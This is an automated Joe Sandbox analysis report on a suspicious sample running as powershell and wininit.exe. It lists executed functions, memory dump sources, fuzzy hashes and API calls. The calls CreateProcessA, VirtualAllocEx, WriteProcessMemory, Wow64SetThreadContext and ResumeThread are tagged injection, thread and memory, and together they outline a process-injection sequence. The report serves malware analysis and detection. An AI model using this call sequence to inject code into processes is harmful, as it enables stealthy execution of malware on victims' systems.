Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: @#c$L4#p$L4#p$L4#p
API String ID: 0-2233465117
Opcode ID: 24cd085a2cc04a7a16f9bc95c6bbf1fddf4e63a56978023dd4d6c1fc6d78906b
Instruction ID: a0081d4996832292f1043f92cd2538af24ac5717c9a0c260850a9b65c021de69
Opcode Fuzzy Hash: 24cd085a2cc04a7a16f9bc95c6bbf1fddf4e63a56978023dd4d6c1fc6d78906b
Instruction Fuzzy Hash: A341E476A002489FDF2A8E14E540BBEB7A5EF80B10F19806BE8555F392D7B0ED94CF51

Analysis Process: wininit.exePID: 2092, Parent PID: 3876COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	99
Total number of Limit Nodes:	8

Executed Functions

Function 003704C0 Relevance: 18.3, Strings: 14, Instructions: 838
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x, xrefs: 00371B47
7, xrefs: 00371A10
j, xrefs: 00371AEA
, xrefs: 003712B9
H{o, xrefs: 00371D2E
, xrefs: 003713BC
E, xrefs: 00371737
9, xrefs: 00371222
E, xrefs: 00371846
&, xrefs: 003717FE
&, xrefs: 003718FE
=, xrefs: 0037121B
_, xrefs: 00371741
C, xrefs: 0037131E

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$H{o$_$j$x
API String ID: 0-3582549290
Opcode ID: 837a4ef56ac073468d70a6a6a65799f258686ec903617eb27315f881e6f1cbd4
Instruction ID: 69b7e0d5a56facb415d9b8f0fb362f0f852da399d467d9440e48d345cd654b12
Opcode Fuzzy Hash: 837a4ef56ac073468d70a6a6a65799f258686ec903617eb27315f881e6f1cbd4
Instruction Fuzzy Hash: 1C826E30A10705CFC769EF74C894B9EB7B2BF89300F5186A9E059AB361DB74A985CF41

Function 0037108F Relevance: 18.3, Strings: 14, Instructions: 823
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x, xrefs: 00371B47
7, xrefs: 00371A10
j, xrefs: 00371AEA
, xrefs: 003712B9
H{o, xrefs: 00371D2E
, xrefs: 003713BC
E, xrefs: 00371737
9, xrefs: 00371222
E, xrefs: 00371846
&, xrefs: 003717FE
&, xrefs: 003718FE
=, xrefs: 0037121B
_, xrefs: 00371741
C, xrefs: 0037131E

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$H{o$_$j$x
API String ID: 0-3582549290
Opcode ID: eb84ca880f64c20294296c676d2620904734d36c62226382dd02d807859e7c78
Instruction ID: 7edfe8465d06cf99599e76ec937ee63e8175793661f6e9a704590b7b2636c76e
Opcode Fuzzy Hash: eb84ca880f64c20294296c676d2620904734d36c62226382dd02d807859e7c78
Instruction Fuzzy Hash: 2E825C30A10705CFC769EF74C894B9EB7B2BF89300F1186A9E0596B361DB75A985CF41

Function 003710D2 Relevance: 18.3, Strings: 14, Instructions: 813
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x, xrefs: 00371B47
7, xrefs: 00371A10
j, xrefs: 00371AEA
, xrefs: 003712B9
H{o, xrefs: 00371D2E
, xrefs: 003713BC
E, xrefs: 00371737
9, xrefs: 00371222
E, xrefs: 00371846
&, xrefs: 003717FE
&, xrefs: 003718FE
=, xrefs: 0037121B
_, xrefs: 00371741
C, xrefs: 0037131E

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$H{o$_$j$x
API String ID: 0-3582549290
Opcode ID: 352ac3dd3d39a3287f5d8c33aade70b4ed83493c101ef08fee892f9505a82cc9
Instruction ID: d4fab2e47fa0eb073c25cc376683860161c8e2c20ff4ca5dd405b516c7fd7257
Opcode Fuzzy Hash: 352ac3dd3d39a3287f5d8c33aade70b4ed83493c101ef08fee892f9505a82cc9
Instruction Fuzzy Hash: 15825D30A10705CFC769EF74C894B9EB7B2BF89300F5186A9E049AB361DB75A985CF41

Function 00372808 Relevance: 4.3, Strings: 3, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~, xrefs: 00372A26
:, xrefs: 00372A87
p!p, xrefs: 00372C8D

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: :$p!p$~
API String ID: 0-320839381
Opcode ID: 5cf9805a62f50dd6d7e2d3383d64a0fa8acda9978770987c87e0739dfa685f07
Instruction ID: 5179b1c02a9ad30f767d5080d4e6cfc548b1233e2f8f9e4c8ce89a461eeeca20
Opcode Fuzzy Hash: 5cf9805a62f50dd6d7e2d3383d64a0fa8acda9978770987c87e0739dfa685f07
Instruction Fuzzy Hash: 4142D475A00228DFDB65CFA9C980B99BBB2FF49300F1580E9E509AB261DB35DD91DF10

Function 0037E0F4 Relevance: 1.8, APIs: 1, Instructions: 328
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E3C7

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c5888719272b6d2e831ae0d469d98a919b8e6874f6c8e7f01865600f93965acc
Instruction ID: b6ef413260fc5d635d5483f568859f450310f7f2ba22be580df574e0695e1220
Opcode Fuzzy Hash: c5888719272b6d2e831ae0d469d98a919b8e6874f6c8e7f01865600f93965acc
Instruction Fuzzy Hash: 87C12670D002298FDF25DFA4C841BEEBBB1BB49304F0095A9E859B7250DB789A85CF95

Function 0037E100 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E3C7

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 279f8877b8f1332bb3193c23905eca980688cf9ada6392b22e02baa7734a9390
Instruction ID: 63fb9b9ec60946c6f6eaa8aa3f36d2d7bb35fd411fa6fc27d98913a6b892c02f
Opcode Fuzzy Hash: 279f8877b8f1332bb3193c23905eca980688cf9ada6392b22e02baa7734a9390
Instruction Fuzzy Hash: 21C10670D002298FDF25DFA4C845BEEBBB1BB49304F0095A9E819B7250DB749A85CF95

Function 0037DD61 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DE3B

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f6790add60b0f4911dabd643280a159d7ba12081b8f9a5a0dd69ec5d196f09e
Instruction ID: 9c9dbf7ed0743fe4b61620b2606e0d7d82151346273f92ebd72d37e69c134d2e
Opcode Fuzzy Hash: 2f6790add60b0f4911dabd643280a159d7ba12081b8f9a5a0dd69ec5d196f09e
Instruction Fuzzy Hash: 3B41ADB4D012489FCF11CFA9D984AEEFBB1BF49314F24942AE815B7250C378AA45CF54

Function 0037DD68 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DE3B

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 975cac9f086aeca2798bbf2dfeb12a21f537a7812d7afb29b498c21cf7a15184
Instruction ID: bb284b596aa0561ade0ca9bcff80b343d487eb61d718989db620b6651f6f0d3d
Opcode Fuzzy Hash: 975cac9f086aeca2798bbf2dfeb12a21f537a7812d7afb29b498c21cf7a15184
Instruction Fuzzy Hash: A641ADB4D012489FCF11CFA9D984AEEFBB1BF49310F20942AE815B7250D738AA45CF54

Function 0037DEC1 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DF7A

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: baf3a75522c3e7ac8003f8c3da58e49e90b2b19a0c805abbdeec29c68a5e814a
Instruction ID: 24a699ec0f9efade7da0e8baa13aaf89c08527b52dcab667943b599f4c37f621
Opcode Fuzzy Hash: baf3a75522c3e7ac8003f8c3da58e49e90b2b19a0c805abbdeec29c68a5e814a
Instruction Fuzzy Hash: 7241ACB8D002589FCF10CFA9D884AEEFBB1BF59310F10942AE815B7250C779AA55CF65

Function 0037DEC8 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DF7A

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cb0724729528876ea2811ac85165334a317db0f66346f3acb393b6a3d5d358ed
Instruction ID: 7e07663d9570513397df3f69d89bc5f4f31d36e79cdc000d8f8be6e42c7fecdd
Opcode Fuzzy Hash: cb0724729528876ea2811ac85165334a317db0f66346f3acb393b6a3d5d358ed
Instruction Fuzzy Hash: 7D41BBB8D002589FCF10CFA9D884AEEFBB1BF49310F10902AE815B7200C734AA45CF65

Function 0037DC39 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DCEA

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d835a97c47cf0256e29035c4167bdaed8d113c94551511ab4adc09a1a32c71d8
Instruction ID: c5db72dc7e22ab7f9056a67037de099064a583cc3fea2ea28382e9b222d43474
Opcode Fuzzy Hash: d835a97c47cf0256e29035c4167bdaed8d113c94551511ab4adc09a1a32c71d8
Instruction Fuzzy Hash: 6341A9B8D002489FCF10CFA9D884AEEFBB1BF49310F20942AE815BB210D775A945CF55

Function 0037DC40 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DCEA

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3856c510bf1caf97950f7adf2952bf10448b306fdacadbe62478e7e20f10c1a4
Instruction ID: 909b783f93455b4b26f50480b243f061fe292bf104ffb944938155ce9ce101f7
Opcode Fuzzy Hash: 3856c510bf1caf97950f7adf2952bf10448b306fdacadbe62478e7e20f10c1a4
Instruction Fuzzy Hash: C74199B8D002589FCF10CFA9D984AAEFBB5BF49310F20942AE814BB210D775A955CF95

Function 0037DB08 Relevance: 1.6, APIs: 1, Instructions: 98
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0037DBBF

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ce425295021dab596b8589c675f60f0ff52100f6a61cca54939f909fadfc1fba
Instruction ID: e07498a6a6d2332555f7cdb5462d328f082bc2010c727b150822b26aa5aaecce
Opcode Fuzzy Hash: ce425295021dab596b8589c675f60f0ff52100f6a61cca54939f909fadfc1fba
Instruction Fuzzy Hash: 8041CFB4D002589FDB10DFA9D884AEEFBF1BF49314F24842AE818B7240D779AA45CF54

Function 0037DB10 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0037DBBF

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 493917f002f9f0ee624054d97418ac95619da0ebcad5e292d942eeb1cdb1abe0
Instruction ID: 0740b70c34a831af3920c6746cfaff89d637af1d4073fee52f784933b091b872
Opcode Fuzzy Hash: 493917f002f9f0ee624054d97418ac95619da0ebcad5e292d942eeb1cdb1abe0
Instruction Fuzzy Hash: 2E41B0B4D002589FDB14DFA9D884AEEFBF1BF49314F24842AE818B7240D778AA45CF54

Function 0037D5E1 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0037D666

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 93a716db1df70141196e1dd18e0a15c767e9a8325b98df024016a131408ac43f
Instruction ID: 0db17dc3ef597fdb387c1cffcf566fddc5f66b8344f5f6cc303048e883291b53
Opcode Fuzzy Hash: 93a716db1df70141196e1dd18e0a15c767e9a8325b98df024016a131408ac43f
Instruction Fuzzy Hash: 0531CAB4D002089FCF14DFA9D884AEEFBB5AF89314F24801AE819B7340C738A905CF94

Function 0037D5E8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0037D666

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 881c65aa143d10c6aebb7140d678a6ca9c967f2152a627e7147f72a597a5ac69
Instruction ID: 21919e6eee71f5b423364ffd2f261cfbfcf0781e451bba09b49a2747d229d5e6
Opcode Fuzzy Hash: 881c65aa143d10c6aebb7140d678a6ca9c967f2152a627e7147f72a597a5ac69
Instruction Fuzzy Hash: 0931BCB4D002189FCF14DFA9D884A9EFBB5BF89314F20941AE818B7340C735A945CF95

Function 0422081F Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

(, xrefs: 0422063F

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: f86841476993962d0e09059f9a1cd86c051475c12fc67a14fb1ba8393318b546
Instruction ID: b9ef0cb217ed05abe073b1bb6fb8c96e974f4a189f28f59d3e46b7a17f964356
Opcode Fuzzy Hash: f86841476993962d0e09059f9a1cd86c051475c12fc67a14fb1ba8393318b546
Instruction Fuzzy Hash: 3EF0CF35A19228EFDB20CF94CA80BE8B7B8EB09314F149199D60DA7252D771AA81DF00

Function 04220189 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45a622673430b3c94504f5937840094010bf97954179493d34724a3126b4cf3
Instruction ID: c4e12f2c2a306fddff0e4c12c34fedea3b1bf97f112f76d840a25a325d3ed16f
Opcode Fuzzy Hash: c45a622673430b3c94504f5937840094010bf97954179493d34724a3126b4cf3
Instruction Fuzzy Hash: 23416A71E6522AEFCB24CF50CD40BE8B7B5BF89300F1092A6D509B6141EBB06AC4DF40

Function 04220112 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64082e449a47d00f43e081a2e0ad025444f1e4157dbb04f1baa6e29d715ba862
Instruction ID: 7a74eaa95129280ea9c949b260fc84cc3f771c49a126114efe2c7f1dc7b2b14a
Opcode Fuzzy Hash: 64082e449a47d00f43e081a2e0ad025444f1e4157dbb04f1baa6e29d715ba862
Instruction Fuzzy Hash: E241E074E54229DFCB20CF14C980BECB7B5BB59304F1081EAD609A7291EBB06AC4DF40

Function 0017D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_17d000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff9c890f84827c24eb2892648a0a9a294f355a2d956894740b25f641da4d69f
Instruction ID: d1a9d48e87b4f80a46b9940e5fcafb428f147365e65496ef0e54ba1c117dc950
Opcode Fuzzy Hash: 7ff9c890f84827c24eb2892648a0a9a294f355a2d956894740b25f641da4d69f
Instruction Fuzzy Hash: 8721B075604248EFEB05DF14E9C0B26BBB5EF84314F34C5A9E8494B282C336D947CA61

Function 0017D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_17d000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d8f069ffb4db388d041fa8c61e63df72b20aae1a01659dbbfe3c221c30d268
Instruction ID: 32294d08661681a6f7c5afb990ecea5863ffe76251080a11ad231ff6337f4e72
Opcode Fuzzy Hash: 17d8f069ffb4db388d041fa8c61e63df72b20aae1a01659dbbfe3c221c30d268
Instruction Fuzzy Hash: D521CF75604248DFDB14DF14E8C4B16BB75EF84314F34C5A9E80D4B286C33AD846CAA1

Function 04220280 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bf9aae31fae0b96899170fefdcb9a00e52639cb987b8f210bb289c296e4a08
Instruction ID: 49898945a3d1c60c84132f71686d17dc4035ff22ad5ba2dd8d32ec79811f10bd
Opcode Fuzzy Hash: 92bf9aae31fae0b96899170fefdcb9a00e52639cb987b8f210bb289c296e4a08
Instruction Fuzzy Hash: 2D214834E19228DFCF64CFA4C980BEDBBB5AB49300F1490999509A7291E7756A85DF00

Function 0017D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_17d000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad69c760fa5fc387b1cbfc2d2d398989e5cf2a715cc84ae81aa90ccb4c88888d
Instruction ID: 1a2d80be148b02e1b401ead92d6ea3083cdc81613f5aa31682b165826e49a153
Opcode Fuzzy Hash: ad69c760fa5fc387b1cbfc2d2d398989e5cf2a715cc84ae81aa90ccb4c88888d
Instruction Fuzzy Hash: B3218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498B2A7C33A984ACB62

Function 0017D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_17d000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
Instruction ID: 52c815ef28cb02b911deba5281035f990efd29d8bf1dbe06e3189aef2660295c
Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
Instruction Fuzzy Hash: 2C11BB75504284DFDB01CF14D5C4B15BFB1FF84314F28C6A9D8494B256C33AD84ACBA2

Function 0422043B Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e157ce9c04d7ccd6839fe102bd43ef12e17cbbd8a953b7c0234a0522749b02d
Instruction ID: f64b46a9072d917f68e629d4ea30b05a138630c69e4994f2f6412d6d8c697e15
Opcode Fuzzy Hash: 7e157ce9c04d7ccd6839fe102bd43ef12e17cbbd8a953b7c0234a0522749b02d
Instruction Fuzzy Hash: E0116038A19268DFDB24CF60C988BE8B7B0FB89305F1481DA840DAB291D7759BC5DF50

Function 042204D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d094935aeaec9b2115c18bdebdc6c11bdb6eb7020774098269218fb3238331cb
Instruction ID: 1517374bc973db21acd9c5c7eaea1f77ef2176947a11f527762089c2729afb8e
Opcode Fuzzy Hash: d094935aeaec9b2115c18bdebdc6c11bdb6eb7020774098269218fb3238331cb
Instruction Fuzzy Hash: 7D01C0B5A142289FCB24DF64C981BDCB7F9AB4D300F10849AE60DA7241D775AA85CF44

Function 04220E68 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02ade7ab6c7be5bb445ec8fb03f42c5d9f5444415cdf5185b7204e7d0800b5b
Instruction ID: b18034d1f61fe96eac32d5f788cf3d92bcc922020c531eda407b9c0191cf3991
Opcode Fuzzy Hash: c02ade7ab6c7be5bb445ec8fb03f42c5d9f5444415cdf5185b7204e7d0800b5b
Instruction Fuzzy Hash: 59F01774E00219EFDB40DFB9CA405AEF7F5EF89300F1485A98818E3300E731AA41DB80

Function 0422070F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d17472ebc9029812d4fa15838df8fe32767a4735e80fee70bd159838305653
Instruction ID: 2afa125f6c2dce826f685f8beb5494075510e91b94306f1c2d141505b1d10bfa
Opcode Fuzzy Hash: 12d17472ebc9029812d4fa15838df8fe32767a4735e80fee70bd159838305653
Instruction Fuzzy Hash: A6F06430A08228DFCB61CFA0C880BE9BBB1AF48300F2400EA9008A7291D7756AC5CF00

Function 04220645 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d82c76a2126782e5a2f44c221e144e3dce797b941ffe77db55c9d3de446a53a
Instruction ID: b9340c28a6e40aa40b8555591d9f593f01dedb66a01afe8a17230e056cb114c2
Opcode Fuzzy Hash: 2d82c76a2126782e5a2f44c221e144e3dce797b941ffe77db55c9d3de446a53a
Instruction Fuzzy Hash: 1EF03A78A11228CFDB24CF60CD54BD8B7B0BB85311F0481DA8819A7391D7749B86CF90

Function 0422048D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c844e42a62768fc6e925e69c1d2fe726b5145802014809e1da6662eeb75e8829
Instruction ID: abf8b67ac57c40c4a8bf2c05776c13495479caab615a0331e5629b4319d394c2
Opcode Fuzzy Hash: c844e42a62768fc6e925e69c1d2fe726b5145802014809e1da6662eeb75e8829
Instruction Fuzzy Hash: 39F0B275A45228DFDBA0CFA4C980BECBBB4FB49311F10809AD90DA7251D631AE85CF40

Function 042202B4 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc45c54aaab2cf6ffda6efe591933e777546ea8df2d4ef15d9a48c0c0200d1b3
Instruction ID: 13cd95bd98fe1dfb15bbcbcfbd4f040963e6cbd4999d1be183d7b4e0e3ba3579
Opcode Fuzzy Hash: cc45c54aaab2cf6ffda6efe591933e777546ea8df2d4ef15d9a48c0c0200d1b3
Instruction Fuzzy Hash: 04F08C34A25228CFDB50CF60CE84BF9FBB5AB49700F0080DA850EA7251D776AA81CF40

Function 0422021A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4220000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626fb820c4db3ad5218c2e00201aa1fad50391c827363a2bf35013143007dc16
Instruction ID: bc853a7f1acdead280aaef66419c93d1a461c2a28472078ab577fa5306e5e137
Opcode Fuzzy Hash: 626fb820c4db3ad5218c2e00201aa1fad50391c827363a2bf35013143007dc16
Instruction Fuzzy Hash: 55E06D34A14128DFCB60CF20CA44BE8B7F4AB58300F48C0DA851CA3251DB74AE85DF10

Non-executed Functions

Function 0037C410 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

Y>0, xrefs: 0037C46B

